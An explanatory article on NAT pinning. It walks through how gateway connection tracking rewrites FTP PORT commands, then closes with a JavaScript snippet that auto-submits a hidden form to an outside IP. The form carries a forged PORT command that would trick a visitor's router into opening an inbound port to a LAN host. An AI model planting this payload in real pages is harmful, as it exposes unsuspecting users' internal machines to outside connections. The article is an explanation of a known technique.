What is NAT pinning
###General In 2010 Samy Kamkar introduced the term NAT pinning, a technique whereby a clients browser is used to generate traffic whick tricks gateway devices on NATted networks into opening and forwarding additional ports to LAN based devices.
###Connection Tracking Connection trackers are modules within netfilter that enable protocols that require secondary connections to operate on NATted networks. Take into consideration the following example of an FTP session
In step 1, the client initiates an FTP connection with the FTP server. At this point, the gateway performs normal NATting operations.
In step 2 the client wants to instruct the FTP server that it wishes for the data connection to be setup on ip 192.168.0.5, TCP port 62001. This is done via the FTP PORT command.
PORT 192,168,0,5,x,y Whereby x,y donates the port number.
As there is no way the FTP server could respond to this command, as 192.168.0.5 is a private IP address this would break FTP operations. This is where connection trackers on the gateway come in to play. When they see this PORT command passing through, they will perform two actions:
- Create a new TCP port listening for inbound connections. This can be the 62001 port as specified by the client, but doesn't have to be.
- Alter the port command by replacing the private IP with its own public IP and the port with the one it just created.
PORT 8,8,8,9,242,49It then sends on this modified packet to the server.
In the third step, the server, having received the modified port command, will attempt to connect back on the public IP and port, as specified in the altered command. The gateway will accept this connection, and forward it to the internal host and port as specified in the original, unaltered port command.
The operations described above are to be considered normal and are required to have some protocols functioning on NATted networks.
###NATpinning So where does NATpinning come in to play? NATpinning attempts to 'trick' a gateway device in performing connection tracking by instructing a browser to mimick the traffic that would normally trigger connection tracking to occur.
<div id="expContainer"></div> <script> var objForm,objData,objData2; objForm = document.createElement("form"); objForm.setAttribute("method", "post"); objForm.setAttribute("action", "http://22.214.171.124/"); objForm.setAttribute("enctype", "multipart/form-data"); objData=document.createElement("input"); objData.setAttribute("type","text"); objData.setAttribute("name","x"); objData.setAttribute("value","PORT 192,168,0,5,242,49"); objData2=document.createElement("input"); objData2.setAttribute("type","text"); objData2.setAttribute("name","y"); objData2.setAttribute("value","LIST"); objForm.appendChild(objData); objForm.appendChild(objData2); document.getElementById("expContainer").appendChild(objForm); objForm.submit(); </script>